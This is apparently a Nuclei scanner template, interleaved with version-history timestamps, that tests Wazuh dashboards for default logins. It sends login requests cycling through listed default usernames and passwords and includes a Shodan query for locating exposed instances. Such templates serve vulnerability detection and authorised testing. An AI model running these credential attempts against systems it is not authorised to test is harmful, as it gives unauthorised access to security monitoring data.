2023-10-17 07:20:28 +00:00
id : wazuh-default-login
info :
name : Wazuh - Default Login
2024-04-02 05:12:19 +00:00
author : theamanrawat,denandz,PulseSecurity.co.nz
2023-10-17 07:20:28 +00:00
severity : high
description : |
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference :
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
- https://wazuh.com
2024-04-02 03:19:54 +00:00
- https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2024-06-07 10:04:29 +00:00
max-request : 7
shodan-query : "title:\"Wazuh\""
2023-10-17 07:20:28 +00:00
tags : wazuh,default-login
http :
2024-04-02 05:12:19 +00:00
- method : GET
path :
2024-04-02 08:40:28 +00:00
- "{{BaseURL}}/app/login"
2024-04-02 05:12:19 +00:00
extractors :
- type : regex
part : body
name : osd
group : 1
internal : true
regex :
- '"version":"([0-9.]+)"'
2023-10-17 07:20:28 +00:00
- raw :
- |
POST /auth/login HTTP/1.1
Host : {{Hostname}}
Osd-Version : {{osd}}
2024-04-02 05:12:19 +00:00
osd-xsrf : osd-fetch
2023-10-17 07:20:28 +00:00
Content-Type : application/json
{"username" : "{{username}}" , "password" : "{{password}}" }
2024-04-02 05:12:19 +00:00
attack : clusterbomb
2023-10-17 07:20:28 +00:00
payloads :
username :
- "admin"
- "wazuh"
password :
- "admin"
- "wazuh"
2024-04-02 03:19:54 +00:00
- "SecretPassword"
2023-10-17 07:20:28 +00:00
stop-at-first-match : true
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"username":'
- '"roles":'
condition : and
- type : word
part : header
words :
- 'application/json'
condition : and
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950